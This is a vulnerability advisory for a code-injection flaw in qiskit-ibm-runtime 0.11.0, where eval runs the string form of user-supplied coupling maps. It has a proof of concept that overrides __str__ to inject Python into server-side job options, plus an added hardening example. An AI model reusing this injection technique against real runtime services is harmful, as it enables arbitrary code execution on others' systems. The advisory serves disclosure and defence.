Uncontrolled Recalculation of Data to Code ('Code Injection') Affecting qiskit-ibm-runtime package, versions [0.11.0,0.11.1)


Severity


CVSS assessment made by Snyk's Security Team.

Threat Intelligence

Exploit Maturity: Proof of concept

  • Snyk ID: SNYK-PYTHON-QISKITIBMRUNTIME-6475237
  • Published: 21 Mar 2024
  • Disclosed: 20 Mar 2024
  • Credit: ihincks

Introduced: 20 Mar 2024

CVE: not available. CWE: CWE-627

How to fix?

Upgrade qiskit-ibm-runtime to version 0.11.1 or higher.

Overview

qiskit-ibm-runtime is an IBM Quantum client for Qiskit Runtime.

Affected versions of this package are vulnerable to Uncontrolled Recalculation of Data to Code ('Code Injection') due to the use of the eval method in Options._get_program_inputs. An attacker can execute arbitrary code by supplying a specially crafted object whose string form, when passed to eval, is executed as Python code. Because Options are processed server-side, this potentially exposes runtime containers to arbitrary code injection.

PoC

from qiskit import QuantumCircuit, transpiler
from qiskit_ibm_runtime import QiskitRuntimeService, Session, Options, Sampler

# Subclass CouplingMap so that str() of the object yields Python source
# instead of the edge list that the eval() in Options._get_program_inputs expects.
class BadActor(transpiler.CouplingMap):
    def __str__(self):
        return "print('external code')"

# from_line is a classmethod, so the result is a BadActor instance.
cmap = BadActor.from_line(42)
service = QiskitRuntimeService()
options = Options(optimization_level=1)
options.simulator = dict(coupling_map=cmap)

bell = QuantumCircuit(2)
bell.h(0)
bell.cx(0, 1)
bell.measure_all()

# The crafted coupling map travels with the job options to the runtime.
with Session(service=service, backend="ibmq_qasm_simulator") as session:
    sampler = Sampler(session=session, options=options).run(bell)
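The eval-of-str pattern described in the Overview and exercised by the PoC, shown beside a hardened conversion of the coupling map, as an added example that is not part of this advisory or of qiskit-ibm-runtime. CouplingMapLike, the marker-only BadActor payload, validate_edges, hardened_program_inputs and parse_coupling_map_text are constructed stand-ins and assumptions, not the project's code or its actual fix.

```python
import ast

class CouplingMapLike:
    """Constructed stand-in for a CouplingMap: a list of edges whose str() form
    is the edge list as a Python literal, e.g. "[[0, 1], [1, 2]]"."""
    def __init__(self, edges):
        self.edges = [tuple(e) for e in edges]

    def get_edges(self):
        return list(self.edges)

    def __str__(self):
        return str([list(e) for e in self.edges])

# Records whether code reached through str() actually executed (constructed marker).
EXECUTED = []

class BadActor(CouplingMapLike):
    # Mirrors the PoC's __str__ override; the payload here only appends a marker.
    def __str__(self):
        return "EXECUTED.append('ran') or []"

def vulnerable_program_inputs(cmap):
    # The pre-0.11.1 pattern the advisory describes: eval() of a caller-controlled str().
    return eval(str(cmap))

def validate_edges(edges):
    # Shape check shared by the hardened paths: a list of [int, int] pairs only.
    ok = isinstance(edges, list) and all(
        isinstance(e, list) and len(e) == 2
        and all(type(q) is int and q >= 0 for q in e) for e in edges)
    if not ok:
        raise ValueError("coupling_map must be a list of [int, int] edges")
    return edges

def hardened_program_inputs(cmap):
    # Hardening (assumed, not the upstream fix): build the payload from the
    # object's data, never from str()/eval(), so an overridden __str__ is irrelevant.
    return validate_edges([list(e) for e in cmap.get_edges()])

def parse_coupling_map_text(text):
    # If only a textual form is available, parse it as data: ast.literal_eval
    # rejects calls, attribute access and boolean operators with ValueError
    # instead of running them.
    return validate_edges(ast.literal_eval(text))
```

Running vulnerable_program_inputs on a BadActor appends the marker, while hardened_program_inputs returns the real edges and parse_coupling_map_text raises on the crafted string without executing it.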

CVSS Scores: version 3.1